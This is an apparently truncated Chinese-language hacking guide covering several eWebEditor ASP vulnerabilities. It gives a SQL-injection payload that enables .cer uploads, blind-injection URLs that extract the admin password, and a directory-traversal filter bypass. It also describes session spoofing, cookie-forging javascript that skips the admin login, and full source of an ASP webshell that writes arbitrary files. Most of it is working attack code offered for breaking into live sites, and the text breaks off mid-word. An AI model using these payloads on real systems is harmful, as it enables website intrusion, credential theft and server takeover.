默认管理页地址2.80以前为ewebeditor/admin_login.asp以后版本为admin/login.asp(各种语言的大家自己改后缀,本文就以asp来进行说明,下面不再细说了!
ewebeditor/db/ewebeditor.asaewebeditor/db/ewebeditor.aspewebeditor/db/#ewebeditor.asaewebeditor/db/#ewebeditor.mdbewebeditor/db/!
@#ewebeditor.aspewebeditor/db/ewebeditor1033.mdb等很多管理员常改.asp后缀,一般访问.asp.asa后缀的都是乱码!
--------------------------------------------------------------------------------------------------------------
action=save&type=IMAGE&style=standard'unionselectS_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrlfromewebeditor_stylewheres_name='standard'and'a'='a"method=postname=myformenctype="multipart/form-data">--------------------------------------------------------------------------------------------------------------以上代码令存为html!
修改红色部分的路径,然后自动上传.cer文件!
漏洞原因是因为sStyleName变量直接从style中读取,并没有过滤,所以可以包含任意字符!
用select在ewebeditor_style表中查找s_name为sStyleName的记录,找不到就提示出错!
在sStyleName变量中用union来构造记录,我们可以在sAllowExt中加入"|cer"、"|asa"等!
另外还有一些版本的ewebeditor的upload.asp文件存在注入漏洞!
贴几个注入用的url!
信息错误则返回脚本出错的提示,在浏览器左下角!
具体利用如下:
ewebeditor/Upload.asp?
type=FILE&style=standard_coolblue1'and%20(select%20top%201%20asc(mid(sys_userpass,15,1))%20from%20ewebeditor_system%20)>98%20and%20'1'='1注意修改红色部分的字段名、位数、ascii码的值!
7、目录遍历漏洞!
这里大概说一下!
目录遍历漏洞基本存在于ewebeditor/admin_uploadfile.asp高版本的是ewebeditor/admin/upload.asp文件!
这个文件有的不需要登陆验证,有些需要!
很多有经验的管理员会把编辑器的目录设置为只读权限,不可修改!
这种情况下,唯一可以利用的也就是利用遍历目录功能查看网站文件,比如数据库路径、后台地址、其他的上传地址、最直观的就是别人留下的小马等等!
这些都自由发挥了!
说下漏洞利用方法!
漏洞利用方式如下:
在上传文件管理页面随便选择一个上传样式!
比如ewebeditor/admin_uploadfile.asp?
id=14在id后面添加&dir=../..类似如下:
webeditor/admin_uploadfile.asp?
id=14&dir=../../../../data/可以看到网站数据库的路径!
另外一个遍历目录的漏洞文件是ewebeditor/asp/browse.asp漏洞代码为:
FunctionGetList()Dims_List,s_Urls_List=""DimoFSO,oUploadFolder,oUploadFiles,oUploadFile,sFileName'Response.WritesCurrDir'OnErrorResumeNextSetoFSO=Server.CreateObject("Scripting.FileSystemObject")SetoUploadFolder=oFSO.GetFolder(Server.MapPath(sCurrDir))'注意一下sCurrDir变量,这个值等下我们可以用到IfErr.Number>0Thens_List=""ExitFunctionEndIf
IfsDir<>""ThenIfInstrRev(sDir,"/")>1Thens_Url=Left(sDir,InstrRev(sDir,"/")-1)Elses_Url=""EndIf
s_List=s_List&""&_""&_".."&_""&_""EndIf'Response.WritesDir&"!
"&s_List
DimoSubFolderForEachoSubFolderInoUploadFolder.SubFolders'Response.WriteoUploadFolder.SubFoldersIfsDir=""Thens_Url=oSubFolder.NameElses_Url=sDir&"/"&oSubFolder.NameEndIfs_List=s_List&""&_""&_""&oSubFolder.Name&""&_""&_""Next'Response.Writes_List
SetoUploadFiles=oUploadFolder.Files
ForEachoUploadFileInoUploadFiles'Response.WriteoUploadFile.NamesFileName=oUploadFile.NameIfCheckValidExt(sFileName)=TrueThen'这行让人有点郁闷,检测了所有允许的文件后缀,如不允许就无法列出,不然就不只列出目录名和图片文件了IfsDir=""Thens_Url=sContentPath&sFileNameElses_Url=sContentPath&sDir&"/"&sFileNameEndIf
s_List=s_List&""&_""&FileName2Pic(sFileName)&""&_""&sFileName&""&_""&GetSizeUnit(oUploadFile.size)&""&_""EndIfNextSetoUploadFolder=NothingSetoUploadFiles=Nothing'Response.WriteServerEncode(s_List)&"!
"&s_Url
IfsDir=""Thens_Url=""'s_Url="/"Elses_Url="/"&sDir&""'s_Url="/"&sDir&"/"EndIf
s_List=s_List&""s_List=HTML2JS(s_List)'Response.WriteServerEncode(s_List)&"!
"&s_Urls_List="parent.setDirList("""&s_List&""","""&s_Url&""")"GetList=s_ListEndFunction'如果没有下面这步检测的话,应该就可以列出目录中所有的文件了,有点郁闷..现在只能列出允许后缀的文件和目录名FunctionCheckValidExt(s_FileName)IfsAllowExt=""ThenCheckValidExt=TrueExitFunctionEndIf
Dimi,aExt,sExtsExt=LCase(Mid(s_FileName,InStrRev(s_FileName,".")+1))CheckValidExt=FalseaExt=Split(LCase(sAllowExt),"|")Fori=0ToUBound(aExt)IfaExt(i)=sExtThenCheckValidExt=TrueExitFunctionEndIfNextEndFunction'我们顺着代码往下找,发现sCurrDir的值是通过下面的值得到的SubInitParam()sType=UCase(Trim(Request.QueryString("type")))sStyleName=Trim(Request.QueryString("style"))
Dimi,aStyleConfig,bValidStylebValidStyle=FalseFori=1ToUbound(aStyle)aStyleConfig=Split(aStyle(i),"|||")IfLcase(sStyleName)=Lcase(aStyleConfig(0))ThenbValidStyle=TrueExitForEndIfNext
IfbValidStyle=FalseThenOutScript("alert('InvalidStyle.')")EndIf
sBaseUrl=aStyleConfig(19)'nAllowBrowse=CLng(aStyleConfig(43))nAllowBrowse=1
IfnAllowBrowse<>1ThenOutScript("alert('Donotallowbrowse!
')")EndIf
sUploadDir=aStyleConfig(3)IfLeft(sUploadDir,1)<>"/"ThenSelectCasesTypeCase"REMOTE"sUploadDir="../../"&sUploadDir&"Image/"Case"FILE"sUploadDir="../../"&sUploadDir&"Other/"Case"MEDIA"sUploadDir="../../"&sUploadDir&"Media/"Case"FLASH"sUploadDir="../../"&sUploadDir&"Flash/"CaseElsesUploadDir="../../"&sUploadDir&"Image/"EndSelectEndIf'sUploadDir=sUploadDir&"/"
SelectCasesBaseUrlCase"0"'sContentPath=aStyleConfig(23)SelectCasesTypeCase"REMOTE"sContentPath="../"&aStyleConfig(3)&"Image/"Case"FILE"sContentPath="../"&aStyleConfig(3)&"Other/"Case"MEDIA"sContentPath="../"&aStyleConfig(3)&"Media/"Case"FLASH"sContentPath="../"&aStyleConfig(3)&"Flash/"CaseElsesContentPath="../"&aStyleConfig(3)&"Image/"EndSelectCase"1"sContentPath=RelativePath2RootPath(sUploadDir)Case"2"sContentPath=RootPath2DomainPath(RelativePath2RootPath(sUploadDir))EndSelect
SelectCasesTypeCase"REMOTE"sAllowExt=aStyleConfig(10)Case"FILE"sAllowExt=aStyleConfig(6)Case"MEDIA"sAllowExt=aStyleConfig(9)Case"FLASH"sAllowExt=aStyleConfig(7)CaseElsesAllowExt=aStyleConfig(8)EndSelect
sCurrDir=sUploadDir'注意这里,这个是得到了配置的路径地址sDir=Trim(Request("dir"))'得到dir变量sDir=Replace(sDir,"\","/")'对dir变量进行过滤sDir=Replace(sDir,"../","")sDir=Replace(sDir,"./","")IfsDir<>""ThenIfCheckValidDir(Server.Mappath(sUploadDir&sDir))=TrueThensCurrDir=sUploadDir&sDir&"/"'重点就在这里了,看到没有,当sUploadDir&sDir存在的时候,sCurrDir就为sUploadDir&sDir的值了'虽然上面对sDir进行了过滤,不过我们完全可以跳过.具体利用下面的利用中给出ElsesDir=""EndIfEndIfEndSub利用方式如下:
site/ewebeditor/asp/browse.asp?
style=standard650&dir=…././/…././/admin这样子就可以看到admin的内容了。
构造特殊的dir绕过上面的验证!
页面空白的时候查看源代码,就可以看到目录列表了!
8、session欺骗漏洞!
适用于一些设置不当的虚拟主机。
当旁注得到一个webshell,而目标站存在ewebeditor却不能找到密码的时候可以尝试欺骗进入后台!
顺序如下:
新建一个.asp文件,内容如下:
<%Session("eWebEditor_User")="123132323"%>然后访问这个文件,再访问ewebeditor/admin_default.asp!
欺骗进入后台!
不过很老了!
9、后台跳过认证漏洞!
访问后台登陆页面!
随便输入帐号密码,返回错误!
然后清空浏览器,在地址栏输入javascript:
alert(document.cookie="adminuser="+escape("admin"));javascript:
alert(document.cookie="adminpass="+escape("admin"));javascript:
alert(document.cookie="admindj="+escape("1"));然后再清空地址栏,在路径里输入后台登陆后的页面,比如:
admin_default.aspadmin/default.asp等。
直接进入后台,利用方式见上文!
10、利用远程上传功能!
比如s_full样式就存在这个功能,打开编辑页面,然后图片,选择输入url比如:
site/1.gif.asp!
然后选择上传远程文件!
自动就把1.gif.asp保存在上传目录内!
注:
网上的东西大部分传来传去,这个办法愚弄自己还成!
文件的确显示后缀为.asp但是不能访问,因为收集过来的时候自动截止在1.gif了所以后面的.asp等于没有!
而且gif的内容就是我们这个url的路径!
呵呵,后来又看到一个利用方式!
是利用远程搜集的时候执行,我们文件的代码生成另外的小马!
利用代码如下:
首先建立1.gif.asp代码如下<%Setfs=CreateObject("Scripting.FileSystemObject")SetMyTextStream=fs.OpenTextFile(server.MapPath("\akteam.asp"),1,false,0)Thetext=MyTextStream.ReadAllresponse.writethetext%>在我们的1.gif.asp的同目录下建立一个akteam.asp文件,内容就是我们的小马:
<%onerrorresumenext%><%ofso="scripting.filesystemobject"%><%setfso=server.createobject(ofso)%><%path=request("path")%><%ifpath<>""then%><%data=request("dama")%><%setdama=fso.createtextfile(path,true)%><%dama.writedata%><%iferr=0then%><%="success"%><%else%><%="false"%><%endif%><%err.clear%><%endif%><%dama.close%><%setdama=nothing%><%setfos=nothing%><%=""%><%=""%><%=""%><%=server.mappath(request.servervariables("script_name"))%><%=""%><%=""%><%=""%><%=""%><%=""%><%=""%>利用上面说的远程上传的方式!
可以得到webshell!
成功率取决于,虚拟主机的安全设置!
11、任意文件删除漏洞!
此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入!
看代码'把带"|"的字符串转为数组DimaSavePathFileNameaSavePathFileName=Split(sSavePathFileName,"|")'删除新闻相关的文件,从文件夹中DimiFori=0ToUBound(aSavePathFileName)'按路径文件名删除文件CallDoDelFile(aSavePathFileName(i))Next而aSavePathFileName是前面从数据库取出来的:
sSavePathFileName=oRs("D_SavePathFileName")看看D_SavePathFileName是怎么添加到数据库里的,在addsave.asp(modifysave.asp)里:
sSavePathFileName=GetSafeStr(Request.Form("d_savepat